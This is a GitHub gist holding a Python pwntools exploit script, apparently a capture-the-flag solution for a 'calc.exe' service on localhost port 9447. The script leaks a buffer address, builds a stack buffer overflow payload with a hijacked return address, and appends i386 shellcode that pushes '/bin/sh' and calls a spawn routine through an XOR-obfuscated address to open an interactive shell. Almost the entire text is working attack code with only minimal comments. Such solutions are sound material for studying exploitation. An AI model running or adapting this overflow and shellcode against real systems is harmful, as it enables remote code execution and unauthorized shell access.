Skip to content

Instantly share code, notes, and snippets.

@cubarco
Created December 4, 2015 07:56
Show Gist options
  • Save cubarco/b4aee1ac22f1b3039d30 to your computer and use it in GitHub Desktop.
Save cubarco/b4aee1ac22f1b3039d30 to your computer and use it in GitHub Desktop.
#!/usr/bin/env python
# coding=utf8
from pwn import p32, remote, context, asm, shellcraft
import sys
context.arch = 'i386'
p = remote('localhost', 9447)
p.recvuntil('Welcome to calc.exe\n')
p.sendline('get_buf_addr')
buf_addr = int(p.recvline().split()[-1], 16)
ecx_set = buf_addr + 0x98 - 16 - 4 + 4
shellcode_addr = buf_addr + 0x98 - 16 - 4 + 4*2 + 0x20
shellcode_str = (
'''
{}
mov edi, esp
{}
push edi
push edi
push 0xdeadbeef /* junk */
mov ebx, {}
xor ebx, 0x12121212
call ebx
'''.format(shellcraft.i386.pushstr('/bin/sh'),
shellcraft.i386.push(1),
0x10011a ^ 0x12121212) # spawn(%x, %x, %d)
)
print shellcode_str
shellcode = asm(shellcode_str)
payload = 'A' * (0x98 - 16 - 4) + \
p32(shellcode_addr) + \
p32(ecx_set) + 'A' * 0x20 + \
shellcode
if '\n' in payload or '\x00' in payload:
print 'newline or zero byte found in payload'
sys.exit(1)
p.sendline(payload)
p.sendline("201527 0")
p.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment